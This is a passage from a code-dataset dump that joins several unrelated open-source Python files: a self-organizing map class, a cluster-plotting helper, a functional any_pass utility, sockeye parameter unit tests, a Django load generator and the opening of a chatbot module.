finally neuron #4 won an object with index `2`. Thus, for this example we will have the following
output `[[1], [0, 3, 4], [], [2]]`.
@return (list) Indexes of captured objects by each neuron.
"""
if self.__ccore_som_pointer is not None:
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
return self._capture_objects
def __init__(self, rows, cols, conn_type=type_conn.grid_eight, parameters=None, ccore=True):
"""!
@brief Constructor of self-organized map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).
"""
        # some of these parameters are required regardless of the core implementation, for example, for network visualization.
self._cols = cols
self._rows = rows
self._size = cols * rows
self._conn_type = conn_type
self._data = None
self._neighbors = None
self._local_radius = 0.0
self._learn_rate = 0.0
self.__ccore_som_pointer = None
self._params = parameters or som_parameters()
if self._params.init_radius is None:
self._params.init_radius = self.__initialize_initial_radius(rows, cols)
if (ccore is True) and ccore_library.workable():
self.__ccore_som_pointer = wrapper.som_create(rows, cols, conn_type, self._params)
else:
# location
self._location = self.__initialize_locations(rows, cols)
# default weights
self._weights = [[0.0]] * self._size
# awards
self._award = [0] * self._size
# captured objects
self._capture_objects = [[] for i in range(self._size)]
# distances - calculate and store them only during training
self._sqrt_distances = None
# connections
if conn_type != type_conn.func_neighbor:
self._create_connections(conn_type)
def __del__(self):
"""!
@brief Destructor of the self-organized feature map.
"""
if self.__ccore_som_pointer is not None:
wrapper.som_destroy(self.__ccore_som_pointer)
def __len__(self):
"""!
        @brief Returns size of the network that is defined by the amount of neurons in it.
@return (uint) Size of self-organized map (amount of neurons).
"""
return self._size
def __getstate__(self):
"""
@brief Returns state of SOM network that can be used to store network.
"""
if self.__ccore_som_pointer is not None:
self.__download_dump_from_ccore()
return self.__get_dump_from_python(True)
return self.__get_dump_from_python(False)
def __setstate__(self, som_state):
"""
@brief Set state of SOM network that can be used to load network.
"""
if som_state['ccore'] is True and ccore_library.workable():
self.__upload_dump_to_ccore(som_state['state'])
else:
self.__upload_dump_to_python(som_state['state'])
def __initialize_initial_radius(self, rows, cols):
"""!
@brief Initialize initial radius using map sizes.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
        @return (float) Value of the initial radius.
"""
if (cols + rows) / 4.0 > 1.0:
return 2.0
elif (cols > 1) and (rows > 1):
return 1.5
else:
return 1.0
def __initialize_locations(self, rows, cols):
"""!
@brief Initialize locations (coordinates in SOM grid) of each neurons in the map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) List of coordinates of each neuron in map.
"""
location = list()
for i in range(rows):
for j in range(cols):
location.append([float(i), float(j)])
return location
def __initialize_distances(self, size, location):
"""!
@brief Initialize distance matrix in SOM grid.
@param[in] size (uint): Amount of neurons in the network.
@param[in] location (list): List of coordinates of each neuron in the network.
@return (list) Distance matrix between neurons in the network.
"""
sqrt_distances = [[[] for i in range(size)] for j in range(size)]
for i in range(size):
for j in range(i, size, 1):
dist = euclidean_distance_square(location[i], location[j])
sqrt_distances[i][j] = dist
sqrt_distances[j][i] = dist
return sqrt_distances
def _create_initial_weights(self, init_type):
"""!
@brief Creates initial weights for neurons in line with the specified initialization.
        @param[in] init_type (type_init): Type of initialization of initial neuron weights (random, random in center of the input data, randomly distributed in data, distributed in line with uniform grid).
"""
dim_info = dimension_info(self._data)
step_x = dim_info.get_center()[0]
if self._rows > 1:
step_x = dim_info.get_width()[0] / (self._rows - 1)
step_y = 0.0
if dim_info.get_dimensions() > 1:
step_y = dim_info.get_center()[1]
if self._cols > 1:
step_y = dim_info.get_width()[1] / (self._cols - 1)
# generate weights (topological coordinates)
random.seed(self._params.random_state)
# Uniform grid.
if init_type == type_init.uniform_grid:
# Predefined weights in line with input data.
self._weights = [[[] for i in range(dim_info.get_dimensions())] for j in range(self._size)]
for i in range(self._size):
location = self._location[i]
for dim in range(dim_info.get_dimensions()):
if dim == 0:
if self._rows > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_x * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif dim == 1:
if self._cols > 1:
self._weights[i][dim] = dim_info.get_minimum_coordinate()[dim] + step_y * location[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
else:
self._weights[i][dim] = dim_info.get_center()[dim]
elif init_type == type_init.random_surface:
# Random weights at the full surface.
self._weights = [
[random.uniform(dim_info.get_minimum_coordinate()[i], dim_info.get_maximum_coordinate()[i]) for i in
range(dim_info.get_dimensions())] for _ in range(self._size)]
elif init_type == type_init.random_centroid:
# Random weights at the center of input data.
self._weights = [[(random.random() + dim_info.get_center()[i]) for i in range(dim_info.get_dimensions())]
for _ in range(self._size)]
else:
# Random weights of input data.
self._weights = [[random.random() for i in range(dim_info.get_dimensions())] for _ in range(self._size)]
def _create_connections(self, conn_type):
"""!
@brief Create connections in line with input rule (grid four, grid eight, honeycomb, function neighbour).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network.
"""
self._neighbors = [[] for index in range(self._size)]
for index in range(0, self._size, 1):
upper_index = index - self._cols
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols + 1
lower_index = index + self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols + 1
left_index = index - 1
right_index = index + 1
node_row_index = math.floor(index / self._cols)
upper_row_index = node_row_index - 1
lower_row_index = node_row_index + 1
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four):
if upper_index >= 0:
self._neighbors[index].append(upper_index)
if lower_index < self._size:
self._neighbors[index].append(lower_index)
if (conn_type == type_conn.grid_eight) or (conn_type == type_conn.grid_four) or (
conn_type == type_conn.honeycomb):
if (left_index >= 0) and (math.floor(left_index / self._cols) == node_row_index):
self._neighbors[index].append(left_index)
if (right_index < self._size) and (math.floor(right_index / self._cols) == node_row_index):
self._neighbors[index].append(right_index)
if conn_type == type_conn.grid_eight:
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
if conn_type == type_conn.honeycomb:
if (node_row_index % 2) == 0:
upper_left_index = index - self._cols
upper_right_index = index - self._cols + 1
lower_left_index = index + self._cols
lower_right_index = index + self._cols + 1
else:
upper_left_index = index - self._cols - 1
upper_right_index = index - self._cols
lower_left_index = index + self._cols - 1
lower_right_index = index + self._cols
if (upper_left_index >= 0) and (math.floor(upper_left_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_left_index)
if (upper_right_index >= 0) and (math.floor(upper_right_index / self._cols) == upper_row_index):
self._neighbors[index].append(upper_right_index)
if (lower_left_index < self._size) and (math.floor(lower_left_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_left_index)
if (lower_right_index < self._size) and (math.floor(lower_right_index / self._cols) == lower_row_index):
self._neighbors[index].append(lower_right_index)
def _competition(self, x):
"""!
@brief Calculates neuron winner (distance, neuron index).
@param[in] x (list): Input pattern from the input data set, for example it can be coordinates of point.
@return (uint) Returns index of neuron that is winner.
"""
index = 0
minimum = euclidean_distance_square(self._weights[0], x)
for i in range(1, self._size, 1):
candidate = euclidean_distance_square(self._weights[i], x)
if candidate < minimum:
index = i
minimum = candidate
return index
def _adaptation(self, index, x):
"""!
        @brief Changes weights of neurons in line with the winner neuron.
@param[in] index (uint): Index of neuron-winner.
@param[in] x (list): Input pattern from the input data set.
"""
dimension = len(self._weights[0])
if self._conn_type == type_conn.func_neighbor:
for neuron_index in range(self._size):
distance = self._sqrt_distances[index][neuron_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neuron_index][i] = self._weights[neuron_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neuron_index][i])
else:
for i in range(dimension):
self._weights[index][i] = self._weights[index][i] + self._learn_rate * (x[i] - self._weights[index][i])
for neighbor_index in self._neighbors[index]:
distance = self._sqrt_distances[index][neighbor_index]
if distance < self._local_radius:
influence = math.exp(-(distance / (2.0 * self._local_radius)))
for i in range(dimension):
self._weights[neighbor_index][i] = self._weights[neighbor_index][
i] + self._learn_rate * influence * (
x[i] - self._weights[neighbor_index][i])
def train(self, data, epochs, autostop=False):
"""!
@brief Trains self-organized feature map (SOM).
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
@param[in] autostop (bool): Automatic termination of learning process when adaptation is not occurred.
@return (uint) Number of learning iterations.
"""
self._data = data
if self.__ccore_som_pointer is not None:
return wrapper.som_train(self.__ccore_som_pointer, data, epochs, autostop)
self._sqrt_distances = self.__initialize_distances(self._size, self._location)
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
# weights
self._create_initial_weights(self._params.init_type)
previous_weights = None
for epoch in range(1, epochs + 1):
# Depression term of coupling
self._local_radius = (self._params.init_radius * math.exp(-(epoch / epochs))) ** 2
self._learn_rate = self._params.init_learn_rate * math.exp(-(epoch / epochs))
# Clear statistics
if autostop:
for i in range(self._size):
self._award[i] = 0
self._capture_objects[i].clear()
for i in range(len(self._data)):
# Step 1: Competition:
index = self._competition(self._data[i])
# Step 2: Adaptation:
self._adaptation(index, self._data[i])
# Update statistics
if (autostop is True) or (epoch == epochs):
self._award[index] += 1
self._capture_objects[index].append(i)
# Check requirement of stopping
if autostop:
if previous_weights is not None:
maximal_adaptation = self._get_maximal_adaptation(previous_weights)
if maximal_adaptation < self._params.adaptation_threshold:
return epoch
previous_weights = [item[:] for item in self._weights]
return epochs
def simulate(self, input_pattern):
"""!
        @brief Processes input pattern (no learning) and returns index of neuron-winner.
                Using the index of the winner neuron, captured objects can be obtained via the property capture_objects.
@param[in] input_pattern (list): Input pattern.
@return (uint) Returns index of neuron-winner.
@see capture_objects
"""
if self.__ccore_som_pointer is not None:
return wrapper.som_simulate(self.__ccore_som_pointer, input_pattern)
return self._competition(input_pattern)
def _get_maximal_adaptation(self, previous_weights):
"""!
        @brief Calculates the maximum change of weights by comparing previous weights and current weights.
@param[in] previous_weights (list): Weights from the previous step of learning process.
@return (double) Value that represents maximum changes of weight after adaptation process.
"""
dimension = len(self._data[0])
maximal_adaptation = 0.0
for neuron_index in range(self._size):
for dim in range(dimension):
current_adaptation = previous_weights[neuron_index][dim] - self._weights[neuron_index][dim]
if current_adaptation < 0:
current_adaptation = -current_adaptation
if maximal_adaptation < current_adaptation:
maximal_adaptation = current_adaptation
return maximal_adaptation
def get_winner_number(self):
"""!
        @brief Calculates the number of winners at the last step of the learning process.
@return (uint) Number of winner.
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
winner_number = 0
for i in range(self._size):
if self._award[i] > 0:
winner_number += 1
return winner_number
def show_distance_matrix(self):
"""!
@brief Shows gray visualization of U-matrix (distance matrix).
@see get_distance_matrix()
"""
distance_matrix = self.get_distance_matrix()
plt.imshow(distance_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("U-Matrix")
plt.colorbar()
plt.show()
def get_distance_matrix(self):
"""!
@brief Calculates distance matrix (U-matrix).
        @details The U-Matrix is visualized based on the distance in input space between a weight vector and its neighbors on the map.
@return (list) Distance matrix (U-matrix).
@see show_distance_matrix()
@see get_density_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
if self._conn_type != type_conn.func_neighbor:
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
distance_matrix = [[0.0] * self._cols for i in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
if self._conn_type == type_conn.func_neighbor:
self._create_connections(type_conn.grid_eight)
for neighbor_index in self._neighbors[neuron_index]:
distance_matrix[i][j] += euclidean_distance_square(self._weights[neuron_index],
self._weights[neighbor_index])
distance_matrix[i][j] /= len(self._neighbors[neuron_index])
return distance_matrix
def show_density_matrix(self, surface_divider=20.0):
"""!
@brief Show density matrix (P-matrix) using kernel density estimation.
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@see show_distance_matrix()
"""
density_matrix = self.get_density_matrix(surface_divider)
plt.imshow(density_matrix, cmap=plt.get_cmap('hot'), interpolation='kaiser')
plt.title("P-Matrix")
plt.colorbar()
plt.show()
def get_density_matrix(self, surface_divider=20.0):
"""!
@brief Calculates density matrix (P-Matrix).
@param[in] surface_divider (double): Divider in each dimension that affect radius for density measurement.
@return (list) Density matrix (P-Matrix).
@see get_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
density_matrix = [[0] * self._cols for i in range(self._rows)]
dimension = len(self._weights[0])
dim_max = [float('-Inf')] * dimension
dim_min = [float('Inf')] * dimension
for weight in self._weights:
for index_dim in range(dimension):
if weight[index_dim] > dim_max[index_dim]:
dim_max[index_dim] = weight[index_dim]
if weight[index_dim] < dim_min[index_dim]:
dim_min[index_dim] = weight[index_dim]
radius = [0.0] * len(self._weights[0])
for index_dim in range(dimension):
radius[index_dim] = (dim_max[index_dim] - dim_min[index_dim]) / surface_divider
## TODO: do not use data
for point in self._data:
for index_neuron in range(len(self)):
point_covered = True
for index_dim in range(dimension):
if abs(point[index_dim] - self._weights[index_neuron][index_dim]) > radius[index_dim]:
point_covered = False
break
row = int(math.floor(index_neuron / self._cols))
col = index_neuron - row * self._cols
if point_covered is True:
density_matrix[row][col] += 1
return density_matrix
def show_winner_matrix(self):
"""!
        @brief Shows a winner matrix where each element corresponds to a neuron and its value represents
                the amount of won objects from the input data-space at the last training iteration.
@see show_distance_matrix()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
(fig, ax) = plt.subplots()
winner_matrix = [[0] * self._cols for _ in range(self._rows)]
for i in range(self._rows):
for j in range(self._cols):
neuron_index = i * self._cols + j
winner_matrix[i][j] = self._award[neuron_index]
ax.text(i, j, str(winner_matrix[i][j]), va='center', ha='center')
ax.imshow(winner_matrix, cmap=plt.get_cmap('cool'), interpolation='none')
ax.grid(True)
plt.title("Winner Matrix")
plt.show()
plt.close(fig)
def show_network(self, awards=False, belongs=False, coupling=True, dataset=True, marker_type='o'):
"""!
@brief Shows neurons in the dimension of data.
        @param[in] awards (bool): If True - displays how many objects each neuron won.
@param[in] belongs (bool): If True - marks each won object by according index of neuron-winner (only when
dataset is displayed too).
@param[in] coupling (bool): If True - displays connections between neurons (except case when function neighbor
is used).
@param[in] dataset (bool): If True - displays inputs data set.
@param[in] marker_type (string): Defines marker that is used to denote neurons on the plot.
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._neighbors = wrapper.som_get_neighbors(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
dimension = len(self._weights[0])
fig = plt.figure()
# Check for dimensions
if (dimension == 1) or (dimension == 2):
axes = fig.add_subplot(111)
elif dimension == 3:
axes = fig.gca(projection='3d')
else:
            raise NotImplementedError('Impossible to show network in data-space that differs from 1D, 2D or 3D.')
if (self._data is not None) and (dataset is True):
for x in self._data:
if dimension == 1:
axes.plot(x[0], 0.0, 'b|', ms=30)
elif dimension == 2:
axes.plot(x[0], x[1], 'b.')
elif dimension == 3:
axes.scatter(x[0], x[1], x[2], c='b', marker='.')
# Show neurons
for index in range(self._size):
color = 'g'
if self._award[index] == 0:
color = 'y'
if dimension == 1:
axes.plot(self._weights[index][0], 0.0, color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], 0.0, location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], 0.0, location, color='blue', fontsize=10)
if dimension == 2:
axes.plot(self._weights[index][0], self._weights[index][1], color + marker_type)
if awards:
location = '{0}'.format(self._award[index])
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=10)
if belongs and self._data is not None:
location = '{0}'.format(index)
axes.text(self._weights[index][0], self._weights[index][1], location, color='black', fontsize=12)
for k in range(len(self._capture_objects[index])):
point = self._data[self._capture_objects[index][k]]
axes.text(point[0], point[1], location, color='blue', fontsize=10)
if (self._conn_type != type_conn.func_neighbor) and (coupling is True):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
'g', linewidth=0.5)
elif dimension == 3:
axes.scatter(self._weights[index][0], self._weights[index][1], self._weights[index][2], c=color,
marker=marker_type)
if (self._conn_type != type_conn.func_neighbor) and (coupling != False):
for neighbor in self._neighbors[index]:
if neighbor > index:
axes.plot([self._weights[index][0], self._weights[neighbor][0]],
[self._weights[index][1], self._weights[neighbor][1]],
[self._weights[index][2], self._weights[neighbor][2]],
'g-', linewidth=0.5)
plt.title("Network Structure")
plt.grid()
plt.show()
plt.close(fig)
def __get_dump_from_python(self, ccore_usage):
return {'ccore': ccore_usage,
'state': {'cols': self._cols,
'rows': self._rows,
'size': self._size,
'conn_type': self._conn_type,
'neighbors': self._neighbors,
'local_radius': self._local_radius,
'learn_rate': self._learn_rate,
'params': self._params,
'location': self._location,
'weights': self._weights,
'award': self._award,
'capture_objects': self._capture_objects}}
def __download_dump_from_ccore(self):
self._location = self.__initialize_locations(self._rows, self._cols)
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
def __upload_common_part(self, state_dump):
self._cols = state_dump['cols']
self._rows = state_dump['rows']
self._size = state_dump['size']
self._conn_type = state_dump['conn_type']
self._neighbors = state_dump['neighbors']
self._local_radius = state_dump['local_radius']
self._learn_rate = state_dump['learn_rate']
self._params = state_dump['params']
self._neighbors = None
def __upload_dump_to_python(self, state_dump):
self.__ccore_som_pointer = None
self.__upload_common_part(state_dump)
self._location = state_dump['location']
self._weights = state_dump['weights']
self._award = state_dump['award']
self._capture_objects = state_dump['capture_objects']
self._location = self.__initialize_locations(self._rows, self._cols)
self._create_connections(self._conn_type)
def __upload_dump_to_ccore(self, state_dump):
self.__upload_common_part(state_dump)
self.__ccore_som_pointer = wrapper.som_create(self._rows, self._cols, self._conn_type, self._params)
wrapper.som_load(self.__ccore_som_pointer, state_dump['weights'], state_dump['award'],
state_dump['capture_objects'])
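# --- Editor's note: illustrative sketch appended to the original module. ---
# The __getstate__/__setstate__ hooks above make a trained map storable, but the
# module ships no example of that feature. This hedged demo uses arbitrary
# assumptions (a 3x3 grid, 50 random 2-D points, 20 epochs) and ccore=False to
# stay in pure Python; it is not part of the upstream pyclustering API surface.
if __name__ == "__main__":
    import pickle

    demo_data = [[random.random(), random.random()] for _ in range(50)]
    demo_network = som(3, 3, type_conn.grid_four, ccore=False)
    demo_network.train(demo_data, 20)

    # Round-trip the trained map through pickle and compare a simple statistic.
    restored_network = pickle.loads(pickle.dumps(demo_network))
    print("winners before pickling:", demo_network.get_winner_number())
    print("winners after pickling: ", restored_network.get_winner_number())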
|
sktime/clustering/evaluation/_plot_clustering.py | marcio55afr/sktime | 5,349 | 21405 | # -*- coding: utf-8 -*-
"""Cluster plotting tools"""
__author__ = ["<NAME>", "<NAME>"]
__all__ = ["plot_cluster_algorithm"]
import pandas as pd
from sktime.clustering.base._typing import NumpyOrDF
from sktime.clustering.base.base import BaseClusterer
from sktime.clustering.partitioning._lloyds_partitioning import (
TimeSeriesLloydsPartitioning,
)
from sktime.datatypes._panel._convert import from_nested_to_2d_array
from sktime.utils.validation._dependencies import _check_soft_dependencies
def _plot(cluster_values, center, axes):
for cluster_series in cluster_values:
axes.plot(cluster_series, color="b")
axes.plot(center, color="r")
def plot_cluster_algorithm(model: BaseClusterer, predict_series: NumpyOrDF, k: int):
"""
    Method that is used to plot a clustering algorithm's output.
Parameters
----------
model: BaseClusterer
Clustering model to plot
predict_series: Numpy or Dataframe
The series to predict the values for
k: int
Number of centers
"""
_check_soft_dependencies("matplotlib")
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
if isinstance(predict_series, pd.DataFrame):
predict_series = from_nested_to_2d_array(predict_series, return_numpy=True)
plt.figure(figsize=(5, 10))
plt.rcParams["figure.dpi"] = 100
indexes = model.predict(predict_series)
centers = model.get_centers()
series_values = TimeSeriesLloydsPartitioning.get_cluster_values(
indexes, predict_series, k
)
fig, axes = plt.subplots(nrows=k, ncols=1)
for i in range(k):
_plot(series_values[i], centers[i], axes[i])
blue_patch = mpatches.Patch(color="blue", label="Series that belong to the cluster")
red_patch = mpatches.Patch(color="red", label="Cluster centers")
plt.legend(
handles=[red_patch, blue_patch],
loc="upper center",
bbox_to_anchor=(0.5, -0.40),
fancybox=True,
shadow=True,
ncol=5,
)
plt.tight_layout()
plt.show()
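# --- Editor's note: illustrative sketch appended to the original module. ---
# plot_cluster_algorithm only calls `predict` and `get_centers` on the model, so
# this hedged demo drives it with a duck-typed stand-in instead of a real fitted
# sktime clusterer. The stub, the random series and k=3 are assumptions made
# purely for illustration; in real use you would pass a fitted BaseClusterer.
if __name__ == "__main__":
    import numpy as np

    class _NearestCenterStub:
        """Minimal stand-in exposing the two methods the plot helper uses."""

        def __init__(self, centers):
            self._centers = centers

        def predict(self, series):
            # Assign each series to the closest center by Euclidean distance.
            return np.array(
                [np.argmin([np.linalg.norm(s - c) for c in self._centers]) for s in series]
            )

        def get_centers(self):
            return self._centers

    rng = np.random.RandomState(0)
    demo_series = rng.rand(12, 30)
    plot_cluster_algorithm(_NearestCenterStub(demo_series[:3]), demo_series, k=3)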
|
pyramda/logic/any_pass.py | sergiors/pyramda | 124 | 21415 | <filename>pyramda/logic/any_pass.py
from pyramda.function.curry import curry
from pyramda.function.always import always
from pyramda.iterable.reduce import reduce
from .either import either
@curry
def any_pass(ps, v):
return reduce(either, always(False), ps)(v)
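# --- Editor's note: illustrative sketch appended to the original module. ---
# any_pass folds the predicates together with `either`, so the combined check
# passes as soon as any single predicate passes. The two lambdas below are
# arbitrary example predicates, not part of the library.
if __name__ == "__main__":
    is_even = lambda x: x % 2 == 0
    is_negative = lambda x: x < 0
    print(any_pass([is_even, is_negative], 4))    # True  (even)
    print(any_pass([is_even, is_negative], -3))   # True  (negative)
    print(any_pass([is_even, is_negative], 3))    # False (neither passes)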
|
test/unit/test_params.py | davvil/sockeye | 1,117 | 21448 | <reponame>davvil/sockeye<gh_stars>1000+
# Copyright 2017--2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import itertools
import glob
import os.path
import tempfile
import mxnet as mx
import pytest
import sockeye.encoder
import sockeye.model
import sockeye.training
import sockeye.constants as C
def test_cleanup_param_files():
with tempfile.TemporaryDirectory() as tmp_dir:
for n in itertools.chain(range(1, 20, 2), range(21, 41)):
# Create empty files
open(os.path.join(tmp_dir, C.PARAMS_NAME % n), "w").close()
sockeye.training.cleanup_params_files(tmp_dir, 5, 40, 17, False, 8, "perplexity", "best")
expectedSurviving = set([os.path.join(tmp_dir, C.PARAMS_NAME % n)
for n in [17, 36, 37, 38, 39, 40]])
# 17 must survive because it is the best one
assert set(glob.glob(os.path.join(tmp_dir, C.PARAMS_PREFIX + "*"))) == expectedSurviving
def test_cleanup_param_files_keep_first():
with tempfile.TemporaryDirectory() as tmp_dir:
for n in itertools.chain(range(0, 20, 2), range(21, 41)):
# Create empty files
open(os.path.join(tmp_dir, C.PARAMS_NAME % n), "w").close()
sockeye.training.cleanup_params_files(tmp_dir, 5, 40, 16, True, 8, "perplexity", "best")
expectedSurviving = set([os.path.join(tmp_dir, C.PARAMS_NAME % n)
for n in [0, 16, 36, 37, 38, 39, 40]])
# 16 must survive because it is the best one
# 0 should also survive because we set keep_first to True
assert set(glob.glob(os.path.join(tmp_dir, C.PARAMS_PREFIX + "*"))) == expectedSurviving
def mock_model():
config_embed = sockeye.encoder.EmbeddingConfig(vocab_size=20, num_embed=4, dropout=0.0)
config_encoder = sockeye.encoder.EncoderConfig(model_size=4, attention_heads=1, feed_forward_num_hidden=4,
act_type='relu', num_layers=1, dropout_attention=0.0,
dropout_act=0.0, dropout_prepost=0.0,
positional_embedding_type='fixed', preprocess_sequence='none',
postprocess_sequence='none', max_seq_len_source=30,
max_seq_len_target=30)
config = sockeye.model.ModelConfig(config_data=None, vocab_source_size=20, vocab_target_size=20,
config_embed_source=config_embed, config_embed_target=config_embed,
config_encoder=config_encoder, config_decoder=config_encoder)
model = sockeye.model.SockeyeModel(config=config)
return model
def test_set_parameters():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(0))
model.set_parameters({'source_target_embed_weight': p})
assert mx.test_utils.same(model.params['source_target_embed_weight'].data(), p.data())
def test_set_parameters_allow_missing():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
model.set_parameters({}, allow_missing=True)
assert 'source_target_embed_weight' in model.params
with pytest.raises(AssertionError) as e:
model.set_parameters({}, allow_missing=False)
assert str(e.value) == "Parameter 'source_target_embed_weight' is missing in new_params dictionary. " \
"Set allow_missing=True to ignore missing parameters."
def test_set_parameters_ignore_extra():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(0))
q = mx.gluon.Parameter('q', shape=(1, 1))
q.initialize(init='xavier', ctx=mx.cpu(0))
params = {'source_target_embed_weight': p, 'q': q}
model.set_parameters(params, ignore_extra=True)
assert 'source_target_embed_weight' in model.params
assert 'q' not in model.params
with pytest.raises(ValueError) as e:
model.set_parameters(params, ignore_extra=False)
assert str(e.value) == "Parameter 'q' in new_params dictionary is not preset in ParameterDict. " \
"Set ignore_extra=True to ignore."
def test_set_parameters_context():
model = mock_model()
model.initialize(init='xavier', ctx=[mx.cpu(0), mx.cpu(1)])
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
p.initialize(init='xavier', ctx=mx.cpu(2))
model.set_parameters({'source_target_embed_weight': p})
for i in range(2):
assert mx.test_utils.same(model.params['source_target_embed_weight'].data(mx.cpu(i)), p.data(mx.cpu(2)))
def test_set_parameters_shape():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(10, 10))
p.initialize(init='xavier', ctx=mx.cpu(0))
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' has shape '(20, 4)' in the model but shape " \
"'(10, 10)' in the new_params dictionary."
def test_set_parameters_uninitialized():
model = mock_model()
model.initialize(init='xavier', ctx=mx.cpu(0))
p = mx.gluon.Parameter('source_target_embed_weight', shape=(20, 4))
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' is not initialized in new_params dictionary."
p.initialize(init='xavier', ctx=mx.cpu(0))
model = mock_model()
with pytest.raises(AssertionError) as e:
model.set_parameters({'source_target_embed_weight': p})
assert str(e.value) == "Parameter 'source_target_embed_weight' must be initialized before it can be reset using " \
"set_parameters."
|
examples/python/django/load-generator.py | ScriptBox99/pyroscope | 5,751 | 21458 | import random
import requests
import time
HOSTS = [
'us-east-1',
'us-west-1',
'eu-west-1',
]
VEHICLES = [
'bike',
'scooter',
'car',
]
if __name__ == "__main__":
print(f"starting load generator")
time.sleep(15)
print('done sleeping')
while True:
host = HOSTS[random.randint(0, len(HOSTS) - 1)]
vehicle = VEHICLES[random.randint(0, len(VEHICLES) - 1)]
print(f"requesting {vehicle} from {host}")
resp = requests.get(f'http://web:8000/{vehicle}')
print(f"received {resp}")
time.sleep(random.uniform(0.2, 0.4))
|
rnn/chatbot/chatbot.py | llichengtong/yx4 | 128 | 21467 | # coding=utf8
import logging
import os
import random
import re
import numpy as np
import tensorflow as tf
from seq2seq_conversation_model import seq2seq_model
from seq2seq_conversation_model import data_utils
from seq2seq_conversation_model import tokenizer
from seq2seq_conversation_model.seq2seq_conversation_model import FLAGS, _buckets
from settings import SEQ2SEQ_MODEL_DIR
_LOGGER = logging.getLogger('track')
UNK_TOKEN_REPLACEMENT = [
'?',
'我不知道你在说什么',
'什么鬼。。。',
'宝宝不知道你在说什么呐。。。',
]
ENGLISHWORD_PATTERN = re.compile(r'[a-zA-Z0-9]')
def is_unichar_englishnum(char):
return ENGLISHWORD_PATTERN.match(char)
def trim(s):
"""
1. delete every space between chinese words
2. suppress extra spaces
:param s: some python string
